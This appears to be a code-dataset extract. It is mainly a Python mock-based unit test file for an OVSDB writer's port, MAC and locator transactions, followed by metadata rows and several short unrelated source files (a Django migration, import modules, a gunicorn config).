'fake_ls_uuid', mock.ANY)
get_rand.assert_called_with(128)
send_n_receive.assert_called_with(query, self.op_id, True)
def test_get_binding_vid(self):
"""Test case to test get_binding_vid."""
query = {'method': 'transact',
'params': [n_const.OVSDB_SCHEMA_NAME,
{'op': 'select',
'table': 'Physical_Port',
'where': [['vlan_bindings', '!=', ['map', []]]],
'columns': ['vlan_bindings']}],
'id': self.op_id}
return_value_raw = '{"id":1,"result":[{"rows":[{"vlan_bindings":[' \
'"map",[[21,["uuid","fake_logical_switch_uuid_21"' \
']]]]},{"vlan_bindings":["map",[[22,["uuid",' \
'"fake_logical_switch_uuid_22"]]]]}]}],' \
'"error":null}'
return_value = return_value_raw.replace(':null', ':None')
self.fake_ovsdb.response = ast.literal_eval(return_value)
expected_result = 21
with mock.patch.object(ovsdb_writer.OVSDBWriter, '_recv_data',
return_value=return_value_raw), \
mock.patch.object(random, 'getrandbits',
return_value=self.op_id) as get_rand, \
mock.patch.object(ovsdb_writer.OVSDBWriter,
'_send_and_receive') as send_n_receive, \
mock.patch.object(ovsdb_writer.LOG,
'debug'):
result = self.fake_ovsdb.get_binding_vid(
'fake_logical_switch_uuid_21')
get_rand.assert_called_with(128)
send_n_receive.assert_called_with(query, self.op_id, True)
self.assertEqual(result, expected_result)
self.fake_ovsdb.responses = [self.fake_message]
def test_update_physical_port(self):
"""Test case to test update_physical_port."""
commit_dict = {'op': 'commit', 'durable': True}
query = {'method': 'transact',
'params': [n_const.OVSDB_SCHEMA_NAME,
{'op': 'update',
'table': 'Physical_Port',
'where': [['name', '==', 'fake_port_name']],
'row': {
'vlan_bindings': [
'map',
[['fake_vlanid', [
'uuid',
'fake_logical_switch_uuid']]]]}},
commit_dict],
'id': self.op_id}
with mock.patch.object(random, 'getrandbits',
return_value=self.op_id) as get_rand, \
mock.patch.object(ovsdb_writer.OVSDBWriter,
'_send_and_receive') as send_n_receive, \
mock.patch.object(ovsdb_writer.LOG,
'debug'):
self.fake_ovsdb.update_physical_port(
'fake_port_name', 'fake_vlanid',
'fake_logical_switch_uuid')
get_rand.assert_called_with(128)
send_n_receive.assert_called_with(query, self.op_id, True)
def test_get_ucast_macs_local(self):
"""Test case to test get_ucast_macs_local."""
query = {'method': 'transact',
'params': [n_const.OVSDB_SCHEMA_NAME,
{'op': 'select',
'table': 'Ucast_Macs_Local',
'where': [['MAC', '==', 'fake_port_mac']]}],
'id': self.op_id}
return_value_raw = '{"id":1,"result":[{"rows":[{"_version":["uuid",' \
'"fake_v_uuid"],"locator":["uuid",' \
'"fake_locator_uuid"],"logical_switch":["uuid",' \
'"fake_ls_uuid"],"_uuid":["uuid","fake_uuid"],' \
'"MAC":"fake_port_mac","ipaddr":""}]}],"error":' \
'null}'
return_value = return_value_raw.replace(':null', ':None')
self.fake_ovsdb.response = ast.literal_eval(return_value)
expected_result = [{'MAC': 'fake_port_mac',
'_uuid': ['uuid', 'fake_uuid'],
'_version': ['uuid', 'fake_v_uuid'],
'ipaddr': '',
'locator': ['uuid', 'fake_locator_uuid'],
'logical_switch': ['uuid', 'fake_ls_uuid']}]
with mock.patch.object(ovsdb_writer.OVSDBWriter, '_recv_data',
return_value=return_value_raw), \
mock.patch.object(random, 'getrandbits',
return_value=self.op_id) as get_rand, \
mock.patch.object(ovsdb_writer.OVSDBWriter,
'_send_and_receive') as send_n_receive, \
mock.patch.object(ovsdb_writer.LOG,
'debug'):
result = self.fake_ovsdb.get_ucast_macs_local('fake_port_mac')
get_rand.assert_called_with(128)
send_n_receive.assert_called_with(query, self.op_id, True)
self.assertEqual(result, expected_result)
self.fake_ovsdb.responses = [self.fake_message]
def test_delete_ucast_macs_local(self):
"""Test case to test delete_ucast_macs_local."""
commit_dict = {'op': 'commit', 'durable': True}
query = {'method': 'transact',
'params': [n_const.OVSDB_SCHEMA_NAME,
{'op': 'delete',
'table': 'Ucast_Macs_Local',
'where': [['MAC', '==', 'fake_MAC_value']]},
commit_dict],
'id': self.op_id}
with mock.patch.object(random, 'getrandbits',
return_value=self.op_id) as get_rand, \
mock.patch.object(ovsdb_writer.OVSDBWriter,
'_send_and_receive') as send_n_receive, \
mock.patch.object(ovsdb_writer.LOG,
'debug'):
self.fake_ovsdb.delete_ucast_macs_local('fake_MAC_value')
get_rand.assert_called_with(128)
send_n_receive.assert_called_with(query, self.op_id, True)
def test_get_physical_locator_uuid(self):
"""Test case to test get_physical_locator_uuid."""
query = {'method': 'transact',
'params': [n_const.OVSDB_SCHEMA_NAME,
{'op': 'select',
'table': 'Physical_Locator',
'where': [['dst_ip', '==', 'fake_dst_ip']]}],
'id': self.op_id}
return_value_raw = '{"id":1,"result":[{"rows":[{"_version":' \
'["uuid","abcd"],"_uuid":["uuid",' \
'"fake_physical_locator_uuid"],"dst_ip":' \
'"fake_dst_ip","encapsulation_type":' \
'"vxlan_over_ipv4"}]}],"error":null}'
return_value = return_value_raw.replace(':null', ':None')
self.fake_ovsdb.response = ast.literal_eval(return_value)
expected_result = 'fake_physical_locator_uuid'
with mock.patch.object(ovsdb_writer.OVSDBWriter, '_recv_data',
return_value=return_value_raw), \
mock.patch.object(random, 'getrandbits',
return_value=self.op_id) as get_rand, \
mock.patch.object(ovsdb_writer.OVSDBWriter,
'_send_and_receive') as send_n_receive, \
mock.patch.object(ovsdb_writer.LOG,
'debug'):
result = self.fake_ovsdb.get_physical_locator_uuid(
'fake_dst_ip')
get_rand.assert_called_with(128)
send_n_receive.assert_called_with(query, self.op_id, True)
self.assertEqual(result, expected_result)
self.fake_ovsdb.responses = [self.fake_message]
def test_insert_ucast_macs_local(self):
"""Test case to test insert_ucast_macs_local."""
commit_dict = {'op': 'commit', 'durable': True}
query = {'method': 'transact',
'params': [n_const.OVSDB_SCHEMA_NAME,
{'op': 'insert',
'table': 'Ucast_Macs_Local',
'row': {'MAC': 'fake_MAC_value',
'logical_switch': [
'uuid',
'fake_logical_switch_uuid'],
'locator': ['uuid',
'fake_locator_uuid']}},
commit_dict],
'id': self.op_id}
with mock.patch.object(random, 'getrandbits',
return_value=self.op_id) as get_rand, \
mock.patch.object(ovsdb_writer.OVSDBWriter,
'_send_and_receive') as send_n_receive, \
mock.patch.object(ovsdb_writer.LOG,
'debug'):
self.fake_ovsdb.insert_ucast_macs_local(
'fake_logical_switch_uuid', 'fake_locator_uuid',
'fake_MAC_value')
get_rand.assert_called_with(128)
send_n_receive.assert_called_with(query, self.op_id, True)
def test_insert_ucast_macs_local_and_locator(self):
"""Test case to test insert_ucast_macs_local_and_locator."""
commit_dict = {'op': 'commit', 'durable': True}
query = {'method': 'transact',
'params': [n_const.OVSDB_SCHEMA_NAME,
{'op': 'insert',
'table': 'Physical_Locator',
'row': {'dst_ip': 'fake_locator_ip',
'encapsulation_type': 'vxlan_over_ipv4'
}, 'uuid-name': 'RVTEP'},
{'op': 'insert',
'table': 'Ucast_Macs_Local',
'row': {'MAC': 'fake_MAC_value',
'logical_switch': [
'uuid',
'fake_logical_switch_uuid'],
'locator': ['named-uuid', 'RVTEP']}},
commit_dict],
'id': self.op_id}
with mock.patch.object(random, 'getrandbits',
return_value=self.op_id) as get_rand, \
mock.patch.object(ovsdb_writer.OVSDBWriter,
'_send_and_receive') as send_n_receive, \
mock.patch.object(ovsdb_writer.LOG,
'debug'):
self.fake_ovsdb.insert_ucast_macs_local_and_locator(
'fake_logical_switch_uuid', 'fake_locator_ip',
'fake_MAC_value')
get_rand.assert_called_with(128)
send_n_receive.assert_called_with(query, self.op_id, True)
def test_get_ucast_macs_remote(self):
"""Test case to test get_ucast_macs_remote."""
query = {'method': 'transact',
'params': [n_const.OVSDB_SCHEMA_NAME,
{'op': 'select',
'table': 'Ucast_Macs_Remote',
'where': [['MAC', '==', 'fake_port_mac']]}],
'id': self.op_id}
return_value_raw = '{"id":1,"result":[{"rows":[{"_version":["uuid",' \
'"fake_v_uuid"],"locator":["uuid",' \
'"fake_locator_uuid"],"logical_switch":["uuid",' \
'"fake_ls_uuid"],"_uuid":["uuid","fake_uuid"],' \
'"MAC":"fake_port_mac","ipaddr":"fake_ipaddr"' \
'}]}],"error":null}'
return_value = return_value_raw.replace(':null', ':None')
self.fake_ovsdb.response = ast.literal_eval(return_value)
expected_result = [{'MAC': 'fake_port_mac',
'_uuid': ['uuid', 'fake_uuid'],
'_version': ['uuid', 'fake_v_uuid'],
'ipaddr': 'fake_ipaddr',
'locator': ['uuid', 'fake_locator_uuid'],
'logical_switch': ['uuid', 'fake_ls_uuid']}]
with mock.patch.object(ovsdb_writer.OVSDBWriter, '_recv_data',
return_value=return_value_raw), \
mock.patch.object(random, 'getrandbits',
return_value=self.op_id) as get_rand, \
mock.patch.object(ovsdb_writer.OVSDBWriter,
'_send_and_receive') as send_n_receive, \
mock.patch.object(ovsdb_writer.LOG,
'debug'):
result = self.fake_ovsdb.get_ucast_macs_remote(
'fake_port_mac')
get_rand.assert_called_with(128)
send_n_receive.assert_called_with(query, self.op_id, True)
self.assertEqual(result, expected_result)
self.fake_ovsdb.responses = [self.fake_message]
def test_delete_ucast_macs_remote(self):
"""Test case to test delete_ucast_macs_remote."""
commit_dict = {'op': 'commit', 'durable': True}
query = {'method': 'transact',
'params': [n_const.OVSDB_SCHEMA_NAME,
{'op': 'delete',
'table': 'Ucast_Macs_Remote',
'where': [['MAC', '==', 'fake_MAC_value']]},
commit_dict],
'id': self.op_id}
with mock.patch.object(random, 'getrandbits',
return_value=self.op_id) as get_rand, \
mock.patch.object(ovsdb_writer.OVSDBWriter,
'_send_and_receive') as send_n_receive, \
mock.patch.object(ovsdb_writer.LOG,
'debug'):
self.fake_ovsdb.delete_ucast_macs_remote(
'fake_MAC_value')
get_rand.assert_called_with(128)
send_n_receive.assert_called_with(query, self.op_id, True)
def test_insert_ucast_macs_remote(self):
"""Test case to test insert_ucast_macs_remote."""
commit_dict = {'op': 'commit', 'durable': True}
query = {'method': 'transact',
'params': [n_const.OVSDB_SCHEMA_NAME,
{'op': 'insert',
'table': 'Ucast_Macs_Remote',
'row': {'MAC': 'fake_MAC_value',
'logical_switch': [
'uuid',
'fake_logical_switch_uuid'],
'locator': ['uuid', 'fake_locator_uuid'],
'ipaddr': 'fake_ipaddr1'}},
{'op': 'insert',
'table': 'Ucast_Macs_Remote',
'row': {'MAC': 'fake_MAC_value',
'logical_switch': [
'uuid',
'fake_logical_switch_uuid'],
'locator': ['uuid', 'fake_locator_uuid'],
'ipaddr': 'fake_ipaddr2'}},
commit_dict],
'id': self.op_id}
with mock.patch.object(random, 'getrandbits',
return_value=self.op_id) as get_rand, \
mock.patch.object(ovsdb_writer.OVSDBWriter,
'_send_and_receive') as send_n_receive, \
mock.patch.object(ovsdb_writer.LOG,
'debug'):
self.fake_ovsdb.insert_ucast_macs_remote(
'fake_logical_switch_uuid', 'fake_MAC_value',
self.fake_ipaddrs, 'fake_locator_uuid', mock.ANY)
get_rand.assert_called_with(128)
send_n_receive.assert_called_with(query, self.op_id, True)
def test_insert_ucast_macs_remote_and_locator(self):
"""Test case to test insert_ucast_macs_remote_and_locator."""
commit_dict = {'op': 'commit', 'durable': True}
query = {'method': 'transact',
'params': [n_const.OVSDB_SCHEMA_NAME,
{'op': 'insert',
'table': 'Physical_Locator',
'row': {'dst_ip': 'fake_locator_ip',
'encapsulation_type': 'vxlan_over_ipv4'
}, 'uuid-name': 'RVTEP'},
{'op': 'insert',
'table': 'Ucast_Macs_Remote',
'row': {'MAC': 'fake_MAC_value',
'logical_switch': [
'uuid',
'fake_logical_switch_uuid'],
'locator': ['named-uuid', 'RVTEP'],
'ipaddr': 'fake_ipaddr1'}},
{'op': 'insert',
'table': 'Ucast_Macs_Remote',
'row': {'MAC': 'fake_MAC_value',
'logical_switch': [
'uuid',
'fake_logical_switch_uuid'],
'locator': ['named-uuid', 'RVTEP'],
'ipaddr': 'fake_ipaddr2'}},
commit_dict],
'id': self.op_id}
with mock.patch.object(random, 'getrandbits',
return_value=self.op_id) as get_rand, \
mock.patch.object(ovsdb_writer.OVSDBWriter,
'_send_and_receive') as send_n_receive, \
mock.patch.object(ovsdb_writer.LOG,
'debug'):
self.fake_ovsdb.insert_ucast_macs_remote_and_locator(
'fake_logical_switch_uuid', 'fake_MAC_value',
self.fake_ipaddrs, 'fake_locator_ip', mock.ANY)
get_rand.assert_called_with(128)
send_n_receive.assert_called_with(query, self.op_id, True)
def test_reset_physical_port(self):
"""Test case to test reset_physical_port."""
commit_dict = {'op': 'commit', 'durable': True}
query = {'method': 'transact',
'params': [n_const.OVSDB_SCHEMA_NAME,
{'op': 'update',
'table': 'Physical_Port',
'where': [['name', '==', 'fake_port_name']],
'row': {'vlan_bindings': ['map', []]}},
commit_dict],
'id': self.op_id}
with mock.patch.object(random, 'getrandbits',
return_value=self.op_id) as get_rand, \
mock.patch.object(ovsdb_writer.OVSDBWriter,
'_send_and_receive') as send_n_receive, \
mock.patch.object(ovsdb_writer.LOG,
'debug'):
self.fake_ovsdb.reset_physical_port(
'fake_port_name')
get_rand.assert_called_with(128)
send_n_receive.assert_called_with(query, self.op_id, True)
# def test_get_logical_switch_uuid_return_none(self):
# """Test case to test get_logical_switch_uuid but none returned."""
# return_value_raw = '{"id":1,"result":[{"rows":[]}],"error":null}'
# return_value_raw = return_value_raw.replace(':null', ':None')
# return_value_dict = ast.literal_eval(return_value_raw)
# self.fake_ovsdb.responses = [return_value_dict]
# with mock.patch.object(ovsdb_writer.OVSDBWriter, '_recv_data',
# return_value=return_value_raw):
# with mock.patch.object(random, 'getrandbits',
# return_value=self.op_id):
# with mock.patch.object(ovsdb_writer.OVSDBWriter,
# '_send_and_receive'):
# with mock.patch.object(ovsdb_writer.LOG, 'debug'):
# self.assertRaises(
# IndexError,
# self.fake_ovsdb.get_logical_switch_uuid,
# self.op_id)
# self.fake_ovsdb.responses = [self.fake_message]
# def test_get_physical_locator_uuid_return_none(self):
# """Test case to test get_physical_locator_uuid but none returned."""
# return_value_raw = '{"id":1,"result":[{"rows":[]}],"error":null}'
# return_value_raw = return_value_raw.replace(':null', ':None')
# return_value_dict = ast.literal_eval(return_value_raw)
# self.fake_ovsdb.responses = [return_value_dict]
# with mock.patch.object(ovsdb_writer.OVSDBWriter, '_recv_data',
# return_value=return_value_raw):
# with mock.patch.object(random, 'getrandbits',
# return_value=self.op_id):
# with mock.patch.object(ovsdb_writer.OVSDBWriter,
# '_send_and_receive'):
# with mock.patch.object(ovsdb_writer.LOG, 'debug'):
# self.assertRaises(
# IndexError,
# self.fake_ovsdb.get_logical_switch_uuid,
# self.op_id)
# self.fake_ovsdb.responses = [self.fake_message]
| 51.732316
| 81
| 0.498673
| 3,634
| 37,299
| 4.757843
| 0.072647
| 0.043725
| 0.072007
| 0.068248
| 0.863852
| 0.834586
| 0.817987
| 0.789879
| 0.765471
| 0.743031
| 0
| 0.00884
| 0.390386
| 37,299
| 720
| 82
| 51.804167
| 0.751561
| 0.102576
| 0
| 0.70084
| 0
| 0
| 0.168501
| 0.050433
| 0
| 0
| 0
| 0
| 0.094118
| 1
| 0.047059
| false
| 0
| 0.018487
| 0
| 0.067227
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5075097a66c566c9a55a174572987cce26ced8de
| 107
|
py
|
Python
|
dynamic_rules/__init__.py
|
Dchouras/dynamic_rules
|
6d2e202c86f1ea5c94010b058c9dacec2c943087
|
[
"MIT"
] | null | null | null |
dynamic_rules/__init__.py
|
Dchouras/dynamic_rules
|
6d2e202c86f1ea5c94010b058c9dacec2c943087
|
[
"MIT"
] | null | null | null |
dynamic_rules/__init__.py
|
Dchouras/dynamic_rules
|
6d2e202c86f1ea5c94010b058c9dacec2c943087
|
[
"MIT"
] | 1
|
2020-05-17T23:26:10.000Z
|
2020-05-17T23:26:10.000Z
|
from dynamic_rules.rule_engine import evaluate_rules
from dynamic_rules.rule_processing import load_rules
| 26.75
| 52
| 0.897196
| 16
| 107
| 5.625
| 0.5625
| 0.244444
| 0.355556
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.084112
| 107
| 3
| 53
| 35.666667
| 0.918367
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
50bcd98a444bb101bf107b50823a6f811af06bbf
| 178
|
py
|
Python
|
CDRTR/core/DeepModel/__init__.py
|
caoyulong/CDRTR
|
f61cf84c096a124066af90f6536d85be630ecdff
|
[
"BSD-2-Clause"
] | 9
|
2019-07-05T14:49:25.000Z
|
2021-05-12T13:37:19.000Z
|
CDRTR/core/DeepModel/__init__.py
|
caoyulong/CDRTR
|
f61cf84c096a124066af90f6536d85be630ecdff
|
[
"BSD-2-Clause"
] | null | null | null |
CDRTR/core/DeepModel/__init__.py
|
caoyulong/CDRTR
|
f61cf84c096a124066af90f6536d85be630ecdff
|
[
"BSD-2-Clause"
] | 1
|
2021-02-13T14:00:26.000Z
|
2021-02-13T14:00:26.000Z
|
from .basic import cnn_text
from .basic import factorization_machine
from .basic import embedding_layer, embedding_lookup
from .basic import EncDec, Encoder, Decoder, AutoEncDec
| 35.6
| 55
| 0.842697
| 24
| 178
| 6.083333
| 0.583333
| 0.246575
| 0.410959
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.11236
| 178
| 4
| 56
| 44.5
| 0.924051
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
50d2cc345b5ab53761ac1b8fe92b6afe74bc2a2d
| 149
|
py
|
Python
|
boxflow/interface/holoviews.py
|
ioam/flowbox
|
197b51c665e0de5266c0710e904fdfb733c95375
|
[
"BSD-3-Clause"
] | 15
|
2017-03-17T08:20:20.000Z
|
2021-04-24T16:32:52.000Z
|
boxflow/interface/holoviews.py
|
ioam/flowbox
|
197b51c665e0de5266c0710e904fdfb733c95375
|
[
"BSD-3-Clause"
] | 2
|
2017-10-10T10:08:36.000Z
|
2018-04-03T23:38:30.000Z
|
boxflow/interface/holoviews.py
|
ioam/boxflow
|
197b51c665e0de5266c0710e904fdfb733c95375
|
[
"BSD-3-Clause"
] | null | null | null |
# Module adapting holoviews classes for use with boxflow
#
#
from __future__ import absolute_import
import holoviews
def load_holoviews():
pass
| 16.555556
| 56
| 0.791946
| 19
| 149
| 5.894737
| 0.789474
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.167785
| 149
| 8
| 57
| 18.625
| 0.903226
| 0.362416
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0.25
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
50deb81cb14ac8093bafb537620d8dd76df82646
| 217
|
py
|
Python
|
ctd_processing/ctd_files/seabird/__init__.py
|
sharksmhi/ctd_processing
|
616df4cd7ed626b678622448a08a0356086a8a3f
|
[
"MIT"
] | null | null | null |
ctd_processing/ctd_files/seabird/__init__.py
|
sharksmhi/ctd_processing
|
616df4cd7ed626b678622448a08a0356086a8a3f
|
[
"MIT"
] | null | null | null |
ctd_processing/ctd_files/seabird/__init__.py
|
sharksmhi/ctd_processing
|
616df4cd7ed626b678622448a08a0356086a8a3f
|
[
"MIT"
] | null | null | null |
from .bl_file import *
from .hdr_file import *
from .modify import *
from .file_pattern_nodc import *
from .sbe_parent_class import *
from .file_pattern_nodc import *
from .file_pattern_old_processing_script import *
| 27.125
| 49
| 0.806452
| 33
| 217
| 4.939394
| 0.424242
| 0.368098
| 0.257669
| 0.386503
| 0.429448
| 0.429448
| 0.429448
| 0
| 0
| 0
| 0
| 0
| 0.129032
| 217
| 7
| 50
| 31
| 0.862434
| 0
| 0
| 0.285714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0fa082d1178472699ce1840f4e0f330820d55f9c
| 168
|
py
|
Python
|
sidekick/api/views/__init__.py
|
cybera/netbox-sidekick
|
ec5e2080513d088e2604d8755f34b1d2592b95dd
|
[
"Apache-2.0"
] | 3
|
2020-09-07T12:14:31.000Z
|
2021-11-11T11:46:43.000Z
|
sidekick/api/views/__init__.py
|
cybera/netbox-sidekick
|
ec5e2080513d088e2604d8755f34b1d2592b95dd
|
[
"Apache-2.0"
] | null | null | null |
sidekick/api/views/__init__.py
|
cybera/netbox-sidekick
|
ec5e2080513d088e2604d8755f34b1d2592b95dd
|
[
"Apache-2.0"
] | null | null | null |
from .device import DeviceCheckAccessView # noqa: F401
from .map import FullMapViewSet # noqa: F401
from .nic import NICListView # noqa: F401
| 42
| 55
| 0.666667
| 18
| 168
| 6.222222
| 0.555556
| 0.214286
| 0.214286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.07438
| 0.279762
| 168
| 3
| 56
| 56
| 0.85124
| 0.190476
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0fa606f8bbb2c063f90f4df17fc98ad233d4bb61
| 3,104
|
py
|
Python
|
dashboard/covid/migrations/0019_auto_20210131_2030.py
|
guiyshd/new-dashboard
|
78e43b066f153a902514a97a7e66349d2ffc9f36
|
[
"MIT"
] | null | null | null |
dashboard/covid/migrations/0019_auto_20210131_2030.py
|
guiyshd/new-dashboard
|
78e43b066f153a902514a97a7e66349d2ffc9f36
|
[
"MIT"
] | null | null | null |
dashboard/covid/migrations/0019_auto_20210131_2030.py
|
guiyshd/new-dashboard
|
78e43b066f153a902514a97a7e66349d2ffc9f36
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.1.5 on 2021-01-31 23:30
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('covid', '0018_auto_20210128_1109'),
]
operations = [
migrations.AlterField(
model_name='wcotabasenacional',
name='city',
field=models.TextField(blank=True, null=True),
),
migrations.AlterField(
model_name='wcotabasenacional',
name='cod_regiaodesaude',
field=models.FloatField(blank=True, null=True),
),
migrations.AlterField(
model_name='wcotabasenacional',
name='country',
field=models.TextField(blank=True, null=True),
),
migrations.AlterField(
model_name='wcotabasenacional',
name='date',
field=models.TextField(blank=True, null=True),
),
migrations.AlterField(
model_name='wcotabasenacional',
name='deaths',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='wcotabasenacional',
name='deaths_by_totalcases',
field=models.FloatField(blank=True, null=True),
),
migrations.AlterField(
model_name='wcotabasenacional',
name='deaths_per_100k_inhabitants',
field=models.FloatField(blank=True, null=True),
),
migrations.AlterField(
model_name='wcotabasenacional',
name='field_source',
field=models.TextField(blank=True, null=True),
),
migrations.AlterField(
model_name='wcotabasenacional',
name='ibgeid',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='wcotabasenacional',
name='last_info_date',
field=models.TextField(blank=True, null=True),
),
migrations.AlterField(
model_name='wcotabasenacional',
name='name_regiaodesaude',
field=models.TextField(blank=True, null=True),
),
migrations.AlterField(
model_name='wcotabasenacional',
name='newcases',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='wcotabasenacional',
name='newdeaths',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='wcotabasenacional',
name='state',
field=models.TextField(blank=True, null=True),
),
migrations.AlterField(
model_name='wcotabasenacional',
name='totalcases',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='wcotabasenacional',
name='totalcases_per_100k_inhabitants',
field=models.FloatField(blank=True, null=True),
),
]
| 33.021277
| 61
| 0.572165
| 266
| 3,104
| 6.556391
| 0.203008
| 0.183486
| 0.229358
| 0.266055
| 0.856078
| 0.856078
| 0.827408
| 0.827408
| 0.827408
| 0.827408
| 0
| 0.017436
| 0.316366
| 3,104
| 93
| 62
| 33.376344
| 0.80443
| 0.014497
| 0
| 0.735632
| 1
| 0
| 0.162905
| 0.026497
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.011494
| 0
| 0.045977
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
0fbc3a54fa54315d31607af5fa3c1e946e5072f8
| 915
|
py
|
Python
|
build/scripts/overnight/python/example_exceptions.py
|
brezillon/opensplice
|
725ae9d949c83fce1746bd7d8a154b9d0a81fe3e
|
[
"Apache-2.0"
] | 133
|
2017-11-09T02:10:00.000Z
|
2022-03-29T09:45:10.000Z
|
build/scripts/overnight/python/example_exceptions.py
|
brezillon/opensplice
|
725ae9d949c83fce1746bd7d8a154b9d0a81fe3e
|
[
"Apache-2.0"
] | 131
|
2017-11-07T14:48:43.000Z
|
2022-03-13T15:30:47.000Z
|
build/scripts/overnight/python/example_exceptions.py
|
brezillon/opensplice
|
725ae9d949c83fce1746bd7d8a154b9d0a81fe3e
|
[
"Apache-2.0"
] | 94
|
2017-11-09T02:26:19.000Z
|
2022-02-24T06:38:25.000Z
|
""" Exceptions module
Defines the exceptions used
"""
class LogCheckFail(RuntimeError):
""" Indicate a scenario failure.
"""
def __init__(self, reason):
""" Constructor
Parameters:
reason: string
the reason for the failure.
"""
RuntimeError.__init__(self, reason)
class MissingExecutable(RuntimeError):
""" Indicate a scenario failure.
"""
def __init__(self, reason):
""" Constructor
Parameters:
reason: string
the reason for the failure.
"""
RuntimeError.__init__(self, reason)
class ExampleFail(RuntimeError):
""" Indicate a scenario failure.
"""
def __init__(self, reason):
""" Constructor
Parameters:
reason: string
the reason for the failure.
"""
RuntimeError.__init__(self, reason)
| 17.264151
| 43
| 0.569399
| 78
| 915
| 6.371795
| 0.282051
| 0.096579
| 0.169014
| 0.17505
| 0.828974
| 0.828974
| 0.828974
| 0.828974
| 0.828974
| 0.828974
| 0
| 0
| 0.335519
| 915
| 52
| 44
| 17.596154
| 0.817434
| 0.417486
| 0
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
e8533e28942d2ceb7cf3c65de23b4ef04a26b2b8
| 147
|
py
|
Python
|
gunicorn_config.py
|
rishipathak6/Aspire
|
3f9e9108eb7a887fcbbc6732288d0097bdf2e37c
|
[
"Apache-2.0"
] | null | null | null |
gunicorn_config.py
|
rishipathak6/Aspire
|
3f9e9108eb7a887fcbbc6732288d0097bdf2e37c
|
[
"Apache-2.0"
] | 3
|
2021-09-08T02:32:23.000Z
|
2022-03-12T00:49:20.000Z
|
gunicorn_config.py
|
rishipathak6/Aspire
|
3f9e9108eb7a887fcbbc6732288d0097bdf2e37c
|
[
"Apache-2.0"
] | 1
|
2019-10-19T08:11:08.000Z
|
2019-10-19T08:11:08.000Z
|
command = '/opt/django/aspire-django/env/bin/gunicorn'
pythonpath = '/opt/django/aspire-django/aspire_project'
bind = '127.0.0.1:8001'
workers = 3
| 29.4
| 55
| 0.741497
| 23
| 147
| 4.695652
| 0.695652
| 0.333333
| 0.277778
| 0.388889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.081481
| 0.081633
| 147
| 4
| 56
| 36.75
| 0.718519
| 0
| 0
| 0
| 0
